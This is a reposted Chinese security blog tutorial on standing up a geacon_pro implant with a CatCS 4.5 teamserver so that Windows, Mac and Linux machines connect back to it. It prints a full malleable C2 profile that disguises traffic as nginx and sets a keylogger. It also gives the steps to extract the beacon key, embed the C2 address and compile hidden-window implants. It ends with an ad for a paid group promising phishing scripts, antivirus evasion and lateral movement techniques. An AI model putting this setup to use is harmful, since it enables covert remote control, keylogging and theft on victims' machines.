geacon_pro配合catcs4.5上线Windows、Mac、Linux
2023-9-3 00:47:16 Author: 小艾搞安全(查看原文) 阅读量:14 收藏

原文:https://www.cnblogs.com/xzajyjs/p/17638743.html

服务端上传配置文件geacon.profile

修改server端和client端的properties,保持一致。这里使用默认的geacon_profile进行测试,上传到server端,保存为geacon.profile

set sleeptime "3000";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

http-get {

 set uri "/www/handle/doc";

 client {
  metadata {
   base64url;
   prepend "SESSIONID=";
   header "Cookie";
  }
 }

 server {
  header "Server" "nginx/1.10.3 (Ubuntu)";
      header "Content-Type" "application/octet-stream";
         header "Connection" "keep-alive";
         header "Vary" "Accept";
         header "Pragma" "public";
         header "Expires" "0";
         header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

  output {
   mask;
   netbios;
   prepend "data=";
   append "%%";
   print;
  }
 }
}

http-post {
 set uri "/IMXo";
 client {
  
  id {    
   mask;
   netbiosu;
   parameter "doc";
  }

  output {
   mask;
   base64url;
   prepend "data=";
   append "%%";  
   print;
  }
 }

 server {
  header "Server" "nginx/1.10.3 (Ubuntu)";
      header "Content-Type" "application/octet-stream";
         header "Connection" "keep-alive";
          header "Vary" "Accept";
         header "Pragma" "public";
         header "Expires" "0";
         header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
          
  output {
   mask;
   netbios;
   prepend "data=";
   append "%%";
   print;
  }
 }
}

post-ex {
    set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
    set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";
    
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    set keylogger "SetWindowsHookEx";
}

CatServer.properties配置文件中添加一行如下:

CatServer.profile = geacon.profile

运行服务端

chmod +x teamserver TeamServer.prop
sudo ./teamserver

客户端连接

接下来生成一个监听器listener,主要要使用https,如果是http需要将geacon_proconfig.gosslHTTP改成"http://"

获取RsaPublicKey

使用BeaconTool工具,读取server端的隐藏文件.cobaltstrike.beacon_keys

java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa

config.go文件中需要修改两处,复制其中的PUBLIC KEY至config中对应位置,修改C2地址为监听器的url

编译

windows


// 配置环境变量
SET CGO_ENABLED=1
SET GOOS=windows
SET GOARCH=amd64
// 编译命令
go build main.go
//压缩编译
go build -ldflags="-H windowsgui -s -w " -trimpath main.go 
-ldflags="-H windowsgui"

linux

SET CGO_ENABLED=0
SET GOOS=linux
SET GOARCH=amd64
go build main.go

Mac

SET CGO_ENABLED=0
SET GOOS=darwin
SET GOARCH=amd64
go build main.go

其中mac上线如下图

配套工具获取

Try师傅的catcs4.5项目以及geacon_pro项目以及BeaconTool.jar公众号后台回复cs45即可获取

小艾安全付费帮会启动!!!

这里有什么?

帮会「专注于实战攻防」

一、实战攻防中的经验分享,比如如何快速打点、快速维权、快速横向等。

二、社工钓鱼信息收集分享、对应话术快速编写方法传授。

三、社工钓鱼实战案例脱敏分享、攻防实战案例分享。 

四、免杀研究分享,各种免杀案例代码与经验分享。

五、SRC漏洞挖掘案例脱敏分享。 

六、帮会内部提供教程、文档、工具、POC/EXP以及各种安全学习笔记等。

如何加入?

目前加入方式为付费加入原创内容输出加入。这里说一下原创内容输出加入条件和后续章程。

内容输出方面: 

可以是安全技术文章,也可以是安全相关本人原创工具,必须为本人原创且首发。发送到邮箱:[email protected],审核通过后可以特邀嘉宾的方式加入帮会,时间为一年。 

帮会内容浏览


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3MTY3NzUwMQ==&mid=2247487548&idx=1&sn=7e895ad991a3534d01221849950eced4&chksm=cefbbb6ef98c3278ec8387c52635e7b574a9ebaf99dca2c1b46bde90f62ae2e08aa6c1a8eb7a&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh